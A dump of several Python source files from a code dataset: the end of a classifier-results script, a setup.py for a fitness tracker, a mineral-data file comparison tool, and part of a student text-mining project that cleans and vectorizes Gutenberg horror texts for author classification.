printlog(resultsPerClassifier)\n resultFormat = '({:0.2f}, {:0.2f}, {:0.2f})'\n for name, results in 
resultsPerClassifier.items():\n print(\"=== %s ===\" % name)\n # determine the best / worst result based on f1-score\n bestRow = reduce((lambda x, y: x if x[2] > y[2] else y), results)[:-1]\n print(\"best (P, R, F): \", resultFormat.format(*bestRow))\n worstRow = reduce((lambda x, y: x if x[2] < y[2] else y), results)[:-1]\n print(\"worst (P, R, F): \", resultFormat.format(*worstRow))\n # calculate the average result.\n summedRows = results[0][:-1] if len(results) == 1 else reduce((lambda x, y: (x[0] + y[0], x[1] + y[1], x[2] + y[2])), results)\n averageRow = list(map((lambda x: x / NUMBER_OF_RUNS), summedRows))\n print(\"average (P, R, F): \", resultFormat.format(*averageRow))\n\n\ndef printPlot(resultsPerClassifier):\n precision = [results[0][0] for name, results in resultsPerClassifier.items()]\n recall = [results[0][1] for name, results in resultsPerClassifier.items()]\n f1Score = [results[0][2] for name, results in resultsPerClassifier.items()]\n xAxis = list(range(*algorithmParameter))\n printlog(list(range(*algorithmParameter)))\n printlog(precision)\n printlog(recall)\n printlog(f1Score)\n\n fig = plt.figure(figsize=(8, 8))\n precisionLine, = plt.plot(xAxis, precision, label='Precision')\n recallLine, = plt.plot(xAxis, recall, label='Recall')\n f1ScoreLine, = plt.plot(xAxis, f1Score, label='F1 Score')\n plt.legend(handles=[precisionLine, recallLine, f1ScoreLine])\n plt.ylabel('performance')\n plt.xlabel(X_LABEL)\n #plt.show()\n plt.savefig(PLOT_FILE_NAME)\n plt.close(fig)\n\n\ndef printlog(message):\n if (LOGGING):\n print(message)\n\n\nif __name__ == '__main__':\n exit = main()\n sys.exit(exit)\n","sub_path":"sc2.py","file_name":"sc2.py","file_ext":"py","file_size_in_byte":12464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"447165208","text":"import os\nfrom setuptools import setup, find_packages\n\ndirectory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"fitness_tracker\",\n version=\"1.0.1\",\n author=\"Jurica Runtas, Kristijan Milić\",\n url=\"https://github.com/JuricaRT/fitness_tracker\",\n license=\"MIT\",\n description=\"Fitness Tracker is a tool that offers a better way of tracking your fitness progress.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n classifiers=[\"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\"],\n install_requires=[\"PyQt5\", \"requests\", \"psycopg2\",\n \"matplotlib\", \"numpy\"],\n python_requires=\">=3.6\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"628570896","text":"#!/usr/bin/env python3\n\nfrom argparse import ArgumentParser, Namespace\nimport pandas as pd\nfrom typing import List\n\nfrom .core import RequiredFields\nfrom .tool import SteinbitTool\nfrom .create import SteinbitCreate\n\n\nEPSILON = 0.01\n\n\ndef has_percent_row(minerals: List[str], df: pd.DataFrame) -> bool:\n \"\"\"\n Return true if this frame has a percentage row\n \"\"\"\n return any(abs(x - 100) < EPSILON for x in df[minerals].sum(axis=1))\n\n\nclass SteinbitCompare(SteinbitTool):\n\n @classmethod\n def 
add_arguments(cls, parser: ArgumentParser):\n \"\"\"\n Add command line arguments for the compare tool\n \"\"\"\n parser.set_defaults(clazz=cls)\n parser.add_argument(\n 'file1', type=str, nargs=1,\n help='The first file to compare')\n parser.add_argument(\n 'file2', type=str, nargs=1,\n help='The second file to compare')\n\n def run(self, args: Namespace):\n \"\"\"\n Compare files by automatically applying any\n required translations\n \"\"\"\n create = SteinbitCreate(self.config)\n frame1 = create.process_files(args.file1)\n frame2 = create.process_files(args.file2)\n\n if frame1.requires_translation() or frame2.requires_translation():\n print(\"Frames require translation...\")\n frame1.translate()\n frame2.translate()\n result1 = frame1.result()\n result2 = frame2.result()\n minerals = frame1.minerals()\n\n if any(has_percent_row(minerals, r) for r in [result1, result2]):\n print(\"Converting to percentage-based\")\n result1 = create.percentages(result1)\n result2 = create.percentages(result2)\n\n columns = set(result1.columns).intersection(result2.columns)\n extra1 = set(result1.columns) - columns\n extra2 = set(result2.columns) - columns\n\n print(\"Comparison result:\")\n if extra1:\n print(\"Extra columns in %s: [%s]\" % (\n args.file1[0],\n \", \".join(extra1)))\n if extra2:\n print(\"Extra columns in %s: [%s]\" % (\n args.file2[0],\n \", \".join(extra2)))\n print(\"-\" * 40)\n result1.set_index(RequiredFields.DEPTH.value, inplace=True, drop=False)\n result2.set_index(RequiredFields.DEPTH.value, inplace=True, drop=False)\n comparison = result1[columns].compare(result2[columns])\n if len(comparison.index) == 0:\n print(\"File data in matching columns is identical\")\n else:\n print(comparison.rename(columns={\n 'self': args.file1[0], 'other': args.file2[0]}))\n","sub_path":"steinbit/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"355278759","text":"# \n# IST 736 - Text Mining \n# Final Project: the horror passage\n# Author: Becky Matthews-Pease, Rohini Shrivastava, Joyce Woznica\n# Date: TBD 2021\n#\n###------------------------------------ Import Packages ---------------------------------------\n# In this section, the packages required for the code are loaded\n# These are the packages required for the entire program and no\n# other imports are used later in the code\n\nimport pandas as pd\nimport numpy as np\n\n# for manipulating strings\nimport string\n# for regular expressions\nimport re\n# after pip install clean-text\nfrom cleantext import clean\n# help with lists and tuples\nfrom operator import itemgetter\n\n# packages for wordclouds\n# note - must install wordcloud\n# conda install -c conda-forge wordcloud\nimport collections\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nfrom PIL import Image\n\n# for plotting\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\n# for colors\n#from colour import Color\nimport random\nimport matplotlib.colors as mcolors\n\n# Import packages\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.probability import FreqDist\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import WordPunctTokenizer\nfrom nltk.collocations import *\nimport os, fnmatch\n\nimport sklearn\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import 
TfidfVectorizer\nfrom nltk.tokenize import word_tokenize, sent_tokenize\n# for lemmatization\nfrom nltk.stem.wordnet import WordNetLemmatizer\n## For Stemming\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.stem.lancaster import LancasterStemmer\n\nfrom sklearn.model_selection import train_test_split\nimport random as rd\n\n# import stuff for sklearn - we use this for plotting things later\nfrom sklearn import datasets, metrics\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.utils import shuffle\n\n# for classification and prediction\nfrom sklearn import preprocessing\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import cross_val_score\n\n# some imports for SVM (preprocessing and LinearSVC are imported above)\nfrom sklearn.svm import SVC\nfrom sklearn import svm\nfrom sklearn.preprocessing import LabelBinarizer\n\n# try PCA\nfrom sklearn.decomposition import PCA\nimport pylab as pl\n\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation, TruncatedSVD\n\n###----------------------------------- Get Directories and Files ------------------------------\n# directories for corpora\nblackwoodDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/blackwood/'\npoeDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/poe/'\nstokerDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/stoker/'\njamesDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/james/'\n\n# the test files are in predictDir\npredictDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/predict/'\n# list of directories\ndirList = [blackwoodDir, poeDir, stokerDir, jamesDir]\n\n# list of files for each corpus\nblackwoodFileList = fnmatch.filter(os.listdir(blackwoodDir), '*.txt')\npoeFileList = fnmatch.filter(os.listdir(poeDir), '*.txt')\nstokerFileList = fnmatch.filter(os.listdir(stokerDir), '*.txt')\njamesFileList = fnmatch.filter(os.listdir(jamesDir), '*.txt')\n\n# this is the test set\npredictFileList = fnmatch.filter(os.listdir(predictDir), '*.txt')\n# list of file lists\nfileLists = [blackwoodFileList, poeFileList, stokerFileList, jamesFileList]\n\ndef build_fullpath(listName, filedir):\n listName = []\n for path in os.listdir(filedir):\n full_path = os.path.join(filedir, path)\n listName.append(full_path)\n return listName\n\n# build lists (empty) for fullpaths\nblackwoodFullPath = []\npoeFullPath = []\nstokerFullPath = []\njamesFullPath = []\n# for predicted\npredictFullPath = []\n\n# full path names\nblackwoodFullPath = build_fullpath(blackwoodFileList, blackwoodDir)\npoeFullPath = build_fullpath(poeFileList, poeDir)\nstokerFullPath = build_fullpath(stokerFileList, stokerDir)\njamesFullPath = build_fullpath(jamesFileList, jamesDir)\n# predicted\npredictFullPath = build_fullpath(predictFileList, predictDir)\n# remember the author is in front of the \"_\" for this one\n\n# build author Dictionary\n# empty dictionary\nauthor_dict = {}\n# empty 
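\n#--------------------------- Full Path Helper (sketch) ---------------------------------\n# NOTE: build_fullpath() above immediately rebinds listName, so its first\n# argument is ignored (which is why an earlier stokerFileList slip on the\n# james line had no effect), and os.listdir() is unfiltered, so non-.txt\n# files could slip into the FullPath lists. A minimal one-argument sketch,\n# assuming every corpus file of interest ends in .txt as the fnmatch filters\n# above imply (build_fullpath2 is a hypothetical name):\nimport glob\n\ndef build_fullpath2(filedir):\n # sorted full paths for the .txt files in filedir only\n return sorted(glob.glob(os.path.join(filedir, '*.txt')))\n\n# usage sketch: jamesFullPath = build_fullpath2(jamesDir)\n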
dictionary\nauthor_dict2 = {}\npredict_author_dict = {}\n# dictionary with integer keys\nauthor_dict = {'blackwood': 'Algernon Blackwood',\n 'poe': 'Edgar Allen Poe', \n 'stoker': 'Bram Stoker',\n 'james': 'M. R. James'}\n\nauthor_dict2 = {'blackwood': 'Algernon Blackwood',\n 'poe': 'Edgar Allen Poe', \n 'stoker': 'Bram Stoker',\n 'james': 'M. R. James',\n 'all': 'Blackwood, Poe, Stoker and James',\n 'predict': 'Short Story Authors'}\n\n# need predicted author dictionary\npredict_author_dict = {'blackwood': 'Algernon Blackwood',\n 'burke': 'Thomas Burke',\n 'curzon': 'George Curzon',\n 'debra': 'Lemuel De Bra',\n 'delamare': 'Walter de la Mare',\n 'doyle': 'A. Conan Doyle',\n 'golding': 'Louis Golding',\n 'hichens': 'Robert Hichens',\n 'hyne': 'Cutliffe Hyne',\n 'jacobs': 'W. W. Jacobs',\n 'lewis': 'M. G. Lewis',\n 'lynch': 'Arthur Lynch',\n 'masefield': 'John Masefield',\n 'mason': 'A. W. Mason',\n 'maugham': 'W. Somerset Maugham',\n 'mordaunt': 'Elinor Mordaunt',\n 'muir': 'Ward Muir',\n 'powys': 'T. F. Powys',\n 'pugh': 'Edwin Pugh',\n 'robertsm': 'Morley Roberts',\n 'robertsr': 'R. Ellis Roberts',\n 'stacpoole': 'H. De Vere Stacpoole',\n 'shelley': 'Mary Shelley',\n 'walpole': 'Horace Walpole',\n 'wharton': 'Edith Wharton',\n 'yeats': 'W. B. Yeats',\n 'poe': 'Edgar Allen Poe', \n 'stoker': 'Bram Stoker',\n 'james': 'M. R. James'\n }\n\n# Joyce to build a book_dict as well\nbook_dict = {}\n# dictionary with integer keys\nbook_dict = {\n # Blackwood Works\n '3johnsilencestories': 'Three John Silence Stories',\n '3morejohnsilencestories': 'Three More John Silence Stories',\n 'aprisoneroffairyland': 'A Prisoner of Fairyland',\n 'dayandnightstories': 'Day and Night Stories',\n 'fourweirdtales': 'Four Weird Tales',\n 'incredibleadventures': 'Incredible Adventures',\n 'thebrightmessenger': 'The Bright Messenger',\n 'thecentaur': 'The Centaur',\n 'thedamned': 'The Damned',\n 'theemptyhouseandotherghoststories': 'The Empty House and Other Ghost Stories',\n 'thegardenofsurvival': 'The Garden of Survival',\n 'thehumanchord': 'The Human Chord',\n 'themanwhomthetreesloved': 'The Man Whom the Trees Loved',\n 'thewave': 'The Wave',\n 'thewendigo': 'The Wendigo',\n 'thewillows': 'The Willows',\n \n # James Works\n #'athinghostandotherstories': 'A Thin Ghost and Other Stories',\n 'theresidentatwhitminster': 'The Resident at Whitminster',\n 'thediaryofmrpoynter': 'The Diary of Mr\\. 
Poytner',\n 'anepisodeofcathedralhistory': 'An Episode of Cathedral History',\n 'thestoryofadisapperanceandanappearance': 'The Story of a Disappearance and an Appearance',\n 'twodoctors': 'Two Doctors',\n #'ghoststoriesofantiquary': 'Ghost Stories of Antiquary',\n 'losthearts': 'Lost Hearts',\n 'countmagnus': 'Count Magnus',\n 'theashtree': 'The Ash-Tree',\n 'themezzotint': 'The Mezzotint',\n #'ghoststoriesofantiquarypart2': 'Ghost Stories of Antiquary Part 2',\n 'aschoolstory': 'A School Story',\n 'castingtherunes': 'Casting the Runes',\n 'martinsclose': 'Martin\\'s Close',\n 'mrhumphreysandhisinheritance': 'Mr Humphreys and His Inheritance',\n 'therosegarden': 'The Rose Garden',\n 'thestallsofbarchestercathedral': 'The Stalls of Barchester Cathedral',\n 'thetractatemiddoth': 'The Tractate Middoth',\n #\n 'thefivejars': 'The Five Jars',\n #'talesofterrorandwonder': 'Tales of Terror and Wonder',\n #'theanaconda': 'The Anaconda',\n #'thebravoofvenice': 'The Bravo of Venice',\n \n # Poe Works\n 'thecaskofamontillado': 'The Cask of Amontillado',\n 'thefallofthehouseofusher': 'The Fall of the House of Usher',\n 'themasqueofthereddeath': 'The Masque of the Red Death',\n 'theraven': 'The Raven',\n #'theworksofedgarallenpoev1': 'The Works of Edgar Allen Poe Volume 1',\n 'themurdersofruemorgue': 'The Murders of the Rue Morgue',\n 'theovalportrait': 'The Oval Portrait',\n 'theunparalleledadventuresofonehanspfaall': 'The Unparalleled Adventures of One Hans Pfaall',\n #'theworksofedgarallenpoev2': 'The Works of Edgar Allen Poe Volume 2',\n 'thepitandthependulum': 'The Pit and the Pendulum',\n 'thetelltaleheart': 'The Tell-Tale Heart',\n 'theprematureburial': 'The Premature Burial',\n #'theworksofedgarallenpoev3': 'The Works of Edgar Allen Poe Volume 3',\n \n #'theworksofedgarallenpoev4': 'The Works of Edgar Allen Poe Volume 4',\n 'theoblongbox': 'The Oblong Box',\n 'thelandscapegarden': 'The Landscape Garden',\n 'lossofbreath': 'Loss of Breath',\n 'metzengerstein': 'Metzengerstein', \n 'thedevilinthebelfry': 'The Devil in the Belfry',\n #'theworksofedgarallenpoev5': 'The Works of Edgar Allen Poe Volume 5',\n 'ataleofjerusalem': 'A Tale of Jerusalem',\n 'somewordswithamummy': 'Some Words with a Mummy',\n \n # Stoker Works\n 'dracula': 'Dracula',\n #'draculasguest': 'Dracula\\'s Guest',\n 'draculasguest': 'Dracula\\'s Guest',\n 'crookensands': 'Crooken Sands',\n 'thejudgeshouse': 'The Judge\\'s House',\n 'theburialofrats': 'The Burial of Rats',\n 'thecomingofabelbehenna': 'The Coming of Abel Behenna',\n 'thesecretofthegrowinggold': 'The Secret of the Growing Gold',\n 'thesquaw': 'The Squaw',\n 'thegipsyprophecy': 'The Gipsy Prophecy', \n #\n 'lairofthewhiteworm': 'Lair of the White Worm',\n 'thejewelofsevenstars': 'The Jewel of Seven Stars',\n 'theladyoftheshroud': 'The Lady of the Shroud',\n 'theman': 'The Man',\n 'thesnakespass': 'The Snake\\'s Pass',\n 'themysteryofthesea': 'The Mystery of the Sea',\n \n # Predict Set of Books + one of each of 4 main authors \n 'adreamofredhands': 'A Dream of Red Hands',\n 'violence': 'Violence',\n 'thechinkandthechild': 'The Chink and the Child',\n 'thedrumsofkairwan': 'The Drums of Kairwan',\n 'alifeabowlofrice': 'A Life a Bowl of Rice',\n 'thecreatures': 'The Creatures',\n 'captainsharkey': 'Captain Sharkey',\n 'thecallofthehand': 'The Call of the Hand',\n 'frankenstein': 'Frankenstein',\n 'thenomad': 'The Nomad',\n 'number13': 'Number 13',\n 'theransom': 'The Ransom',\n 'themonkeyspaw': 'The Monkey\\'s Paw',\n 'themonk': 'The Monk',\n 'thesentimentalmortgage': 
'The Sentimental Mortgage',\n 'davyjonessgift': 'Davy Jones\\'s Gift',\n 'hatteras': 'Hatteras',\n 'thetaipan': 'The Taiapn',\n 'hodge': 'Hodge',\n 'therewardofenterprise': 'The Reward of Enterprise',\n 'alleluia': 'Alleluia',\n 'theothertwin': 'The Other Twin',\n 'grearsdam': 'Grear\\'s Dam',\n 'thenarrowway': 'The Narrow Way',\n 'thekingofmaleka': 'The King of Maleka',\n 'kerfol': 'Kerfol',\n 'thegoldbug': 'The Gold Bug',\n 'thecrucifixionoftheoutcast': 'The Crucifixion of the Outcast',\n 'thecastleofotranto': 'The Castle of Oranto'\n }\n\n#------------------------------- Publishing Information --------------------------------------\n# initialize list of lists \nauthorDF = [[1, 'Edgar Allen Poe', 1809, 1849, 1827], \n [2, 'Bram Stoker', 1847, 1912, 1897],\n [3, 'M.R. James', 1862, 1936, 1904],\n [4, 'Algernon Blackwood', 1869, 1951, 1909],\n [5, 'Thomas Burke', 1886, 1945, 1961],\n [6, 'George Curzon', 1859, 1925, 1915],\n [7, 'Lemuel De Bra', 1884, 1954, 1925],\n [8, 'Walter de la Mare', 1873, 1956, 1902],\n [9, 'A. Conan Doyle', 1859, 1930, 1892],\n [10, 'Louis Golding', 1895, 1958, 1919],\n [11, 'Robert Hichens', 1864, 1950, 1886],\n [12, 'Cutliffe Hyne', 1866, 1944, 1900],\n [13, 'W. W. Jacobs', 1863, 1943, 1885],\n [14, 'M. G. Lewis', 1775, 1818, 1796],\n [15, 'Arthur Lynch', 1861, 1934, 1893],\n [16, 'John Masefield', 1878, 1967, 1902],\n [17, 'A. W. Mason', 1865, 1948, 1895],\n [18, 'W. Somerset Maugham', 1874, 1965, 1897],\n [19, 'Elinor Mordaunt', 1872, 1942, 1902],\n [20, 'Ward Muir', 1878, 1927, 1917],\n [21, 'T. F. Powys', 1875, 1953, 1927],\n [22, 'Morley Roberts', 1857, 1942, 1887],\n [23, 'R. Ellis Roberts', 1879, 1953, 1938],\n [24, 'H. De Vere Stacpoole', 1863, 1951, 1908],\n [25, 'Mary Shelley', 1797, 1851, 1807],\n [26, 'Horace Walpole', 1717, 1797, 1764],\n [27, 'Edith Wharton', 1862, 1937, 1905],\n [28, 'W. B. Yeats', 1865, 1939, 1886]]\n\n# Create the pandas DataFrame \nauthorDF = pd.DataFrame(authorDF, columns = ['Row', 'Author', 'BirthYear', 'DeathYear', 'FirstPubYear']) \n\n#------------------------------- Publishing TimeLine ------------------------------------------\nauthor_names = authorDF['Author']\norder = []\nplt.rcParams['figure.figsize']=11,8\nax = plt.gca()\nfor index, author in authorDF.iterrows():\n x_vals = []\n y_vals = []\n y_vals = [author['Row'], author['Row'], author['Row']]\n x_vals = [author['BirthYear'], author['FirstPubYear'], author['DeathYear']]\n mymark = 'o'\n myline = 'solid'\n mylabel = author['Author']\n \n if mylabel == 'Edgar Allen Poe' or mylabel == 'Bram Stoker' or mylabel == 'M.R. 
James' or mylabel == 'Algernon Blackwood':\n mymark = 's'\n myline = 'dashed'\n\n plt.plot(x_vals, y_vals, marker = mymark, label = mylabel, linestyle = myline)\n o = 27 - index\n order = order + [o]\n \nplt.title(\"Author Birthdate, First Publication Date, Date of Death\", fontsize = 12)\nplt.xlabel(\"Dates\", fontsize = 10)\nhandles, labels = ax.get_legend_handles_labels()\nplt.legend([handles[idx] for idx in order],[labels[idx] for idx in order],\n shadow=True, fancybox=True, \n loc='right', bbox_to_anchor = (1.3, 0.5)) \nax.axes.yaxis.set_visible(False)\nax.set_xlim(1705, 1975)\nplt.show()\n\n#-------------------------------- Clean the data ----------------------------------------------\n# get rid of headers and footers that are gutenberg specific\n# first need to remove all the header and footer standard gutenbert stuff - should be able to\n# do with line numbers\n#------------------------------\n\n# create a function passing the dataframe and the column and run all these\n# functions to clean them up\ndef remove_punct_more(book_string):\n # remove new lines from text\n # need to fix this one\n # need to remove illustrations\n # ** JOYCE TO TEST THIS LINE **\n book_string = book_string.replace('\\[Illustration\\]', '')\n # should consider removing Chapter #\n book_string = book_string.replace(r\"\\\\t|\\\\n|\\\\r\", \"\")\n book_string = book_string.replace(\"\\t|\\n|\\r\", \"\")\n # replace the \\ in from of the apostrophes\n book_string = book_string.replace(r\"[\\\\,]\", \"\")\n # remove the apostrophe at the beginning on each line\n book_string = book_string.replace(r\"(^\\')\", \"\")\n # remove the apostrophe at the end of each line\n book_string = book_string.replace(r\"(\\'$)\", \"\")\n # remove digits (numbers) from the text\n # 3/3 - this isn't working\n #book_string = book_string.replace(r'[0-9]+', '')\n book_string = re.sub(r'\\d+', '', book_string)\n # remove special (punctuation) characters\n # 3/3 - maybe fix this with individual replaces?\n spec_chars = [\"!\",'\"',\"#\",\"%\",\"&\",\"(\",\")\",\"_\",\n \"*\",\"+\",\",\",\"-\",\".\",\"/\",\":\",\";\",\"<\",\n \"=\",\">\",\"?\",\"@\",\"[\",\"\\\\\",\"]\",\"^\",\"_\",\n \"`\",\"{\",\"|\",\"}\",\"~\",\"–\",\"—\",\"'\",'“',\"’\",'”']\n for char in spec_chars:\n book_string = book_string.replace(char, ' ')\n # now remove the extra white space\n # ** need to fix these multiple spaces **\n #book_string = book_string.replace(' +', ' ')\n book_string = re.sub(' +', ' ', book_string)\n return book_string\n\n# Read in the text files for each book selected\n# empty DF of the author and each book\ndef read_book (author, fullPathList):\n bookDF = pd.DataFrame(columns = ['book_author', 'book_name', 'book_text'])\n # we can put the author in now and the book name as we process this\n for book in fullPathList:\n # extract the book name\n temp = book.split('/')\n fname = temp[len(temp)-1]\n book_name = fname.split('.')[0]\n # open book for reading\n book_text = open(book, 'r')\n # get raw data\n book_raw = book_text.read()\n # get number of lines\n book_lines = book_raw.split('\\n')\n # could use this\n # kill the end of the book (last 365)\n # 3/2 - need to modify this to remove everything above this line\n # *** START OF THIS PROJECT GUTENBERG EBOOK ... up to the \\n\n book_lines = book_lines[0:len(book_lines)-365]\n # kill the first few lines of the book (first 30)\n # 3/2 - need to modify this to remove everything below this line\n # *** END OF THIS PROJECT GUTENBERG EBOOK ... 
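\n# A hedged sketch for the TODO comments above: look for the standard Project\n# Gutenberg '*** START OF ...' / '*** END OF ...' marker lines instead of\n# trimming fixed line counts, falling back to the fixed offsets when no\n# markers are present (marker wording varies between Gutenberg files, so\n# treat the substring tests as an assumption):\ndef trim_gutenberg(lines):\n start, end = 0, len(lines)\n for i, line in enumerate(lines):\n if '*** START OF' in line.upper():\n start = i + 1\n elif '*** END OF' in line.upper():\n end = i\n break\n if start == 0 and end == len(lines):\n # no markers found - fall back to the fixed trim used here\n return lines[27:len(lines)-365]\n return lines[start:end]\n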
to \\n\n book_lines = book_lines[27:len(book_lines)]\n # put it all back as a single text object\n # using list comprehension \n blinesToStr = ' '.join([str(elem) for elem in book_lines]) \n # send it for cleaning as a big chunk\n clean_bookText = remove_punct_more(blinesToStr)\n # close the book\n book_text.close()\n # now need to add the booktext to the dataframe\n df_row = {'book_author': author,\n 'book_name': book_name,\n 'book_text': clean_bookText}\n # append the row to the bookDF\n bookDF = bookDF.append(df_row, ignore_index = True)\n return bookDF\n \n# this should return a dataframe of the author, book name and cleaned text for CountVectorizer\n# Now call for each author\n# blackwood, poe, stoker, james\n\n# Blackwood\nblackwoodDF = []\nblackwoodDF = read_book('blackwood', blackwoodFullPath)\n\n# Poe\npoeDF = []\npoeDF = read_book('poe', poeFullPath)\n# issue with the Raven - but works for Poe - need to extract the allocolades to Poe\n# what to do with the volumes texts\n\n# Stoker\nstokerDF = []\nstokerDF = read_book('stoker', stokerFullPath)\n\n# James\njamesDF = []\njamesDF = read_book('james', jamesFullPath)\n\n# special read for the predict to split out the book and author name \n# can combine the functions passing 'test' or 'train', but for now\n# two functions\ndef read_predict_book (fullPathList):\n bookDF = pd.DataFrame(columns = ['book_author', 'book_name', 'book_text'])\n # we can put the author in now and the book name as we process this\n for book in fullPathList:\n #print('Book is ', book)\n # extract the book name\n temp = book.split('/')\n fname = temp[len(temp)-1]\n author = fname.split('_')[0]\n temp = fname.split('_')[1]\n book_name = temp.split('.')[0]\n # open book for reading\n book_text = open(book, 'r')\n # get raw data\n book_raw = book_text.read()\n # get number of lines\n book_lines = book_raw.split('\\n')\n # could use this\n # kill the end of the book (last 365)\n book_lines = book_lines[0:len(book_lines)-365]\n # kill the first few lines of the book (first 30)\n book_lines = book_lines[30:len(book_lines)]\n # put it all back as a single text object\n # using list comprehension \n blinesToStr = ' '.join([str(elem) for elem in book_lines]) \n # send it for cleaning as a big chunk\n clean_bookText = remove_punct_more(blinesToStr)\n # close the book\n book_text.close()\n # now need to add the booktext to the dataframe\n df_row = {'book_author': author,\n 'book_name': book_name,\n 'book_text': clean_bookText}\n # append the row to the bookDF\n bookDF = bookDF.append(df_row, ignore_index = True)\n return bookDF\n\npredictDF = []\npredictDF = read_predict_book(predictFullPath)\n\n# join all frames together for joint vectorization\n# build a single DF for all the four source authors\nframes = [blackwoodDF, poeDF, stokerDF, jamesDF]\nallframes = [blackwoodDF, poeDF, stokerDF, jamesDF, predictDF]\nbookDF = pd.concat(frames)\nallbookDF = pd.concat(allframes)\n# reindex\nbookDF.reset_index(inplace=True, drop=True)\nallbookDF.reset_index(inplace=True, drop=True)\n\n#-------------------------------- Vectorization for MultinomialNB ---------------------------\n# ** NOTE: this is using non-stemmed data **\n# Create an instance of CountVectorizer (one for the corpus)\n# now that we have good, clean data\nblackwoodCV = CountVectorizer(input = 'content', \n analyzer = 'word',\n stop_words='english')\npoeCV = CountVectorizer(input = 'conent', \n analyzer = 'word',\n stop_words='english')\nstokerCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n 
stop_words='english')\njamesCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\nbookCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\npredictCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\nallbookCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\n\n# add a stemmer\nSTEMMER=PorterStemmer()\n#print(STEMMER.stem(\"fishings\"))\n\n# Use NLTK's PorterStemmer in a function\ndef MY_STEMMER(str_input): #I like dogs a lot111 !!\"\n words = re.sub(r\"[^A-Za-z\\-]\", \" \", str_input).lower().split() \n words = [STEMMER.stem(w) for w in words]\n return words\n\nallbookCV_STEM = CountVectorizer(input = 'content',\n analyzer = 'word',\n tokenizer = MY_STEMMER,\n stop_words = 'english')\n\n\n# build total list of just the book text\nblackwood_text_list = blackwoodDF['book_text'].tolist()\npoe_text_list = poeDF['book_text'].tolist()\nstoker_text_list = stokerDF['book_text'].tolist()\njames_text_list = jamesDF['book_text'].tolist()\nbook_text_list = bookDF['book_text'].tolist()\npredict_text_list = predictDF['book_text'].tolist()\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nblackwoodDTM = blackwoodCV.fit_transform(blackwood_text_list)\npoeDTM = poeCV.fit_transform(poe_text_list)\nstokerDTM = stokerCV.fit_transform(stoker_text_list)\njamesDTM = jamesCV.fit_transform(james_text_list)\nbookDTM = bookCV.fit_transform(book_text_list)\npredictDTM = predictCV.fit_transform(predict_text_list)\nallbookDTM = allbookCV.fit_transform(allbook_text_list)\nallbookDTM_STEM = allbookCV_STEM.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nblackwoodVocab = blackwoodCV.get_feature_names()\npoeVocab = poeCV.get_feature_names()\nstokerVocab = stokerCV.get_feature_names()\njamesVocab = jamesCV.get_feature_names()\nbookVocab = bookCV.get_feature_names()\npredictVocab = predictCV.get_feature_names()\nallbookVocab = allbookCV.get_feature_names()\nallbookVocab_STEM = allbookCV_STEM.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nblackwoodVectorDF = pd.DataFrame(blackwoodDTM.toarray(), columns = blackwoodVocab)\npoeVectorDF = pd.DataFrame(poeDTM.toarray(), columns = poeVocab)\nstokerVectorDF = pd.DataFrame(stokerDTM.toarray(), columns = stokerVocab)\njamesVectorDF = pd.DataFrame(jamesDTM.toarray(), columns = jamesVocab)\nbookVectorDF = pd.DataFrame(bookDTM.toarray(), columns = bookVocab)\npredictVectorDF = pd.DataFrame(predictDTM.toarray(), columns = predictVocab)\nallbookVectorDF = pd.DataFrame(allbookDTM.toarray(), columns = allbookVocab)\nallbookVectorDF_STEM = pd.DataFrame(allbookDTM_STEM.toarray(), columns = allbookVocab_STEM)\n\n# now we need to \"attach\" the author to each frame\nblackwoodLabel = blackwoodDF['book_author']\n# array for author labels\nblackwoodLabelArray = blackwoodLabel.to_numpy()\npoeLabel = poeDF['book_author']\npoeLabelArray = poeLabel.to_numpy()\nstokerLabel = stokerDF['book_author']\nstokerLabelArray = stokerLabel.to_numpy()\njamesLabel = jamesDF['book_author']\njamesLabelArray = jamesLabel.to_numpy()\nbookLabel = 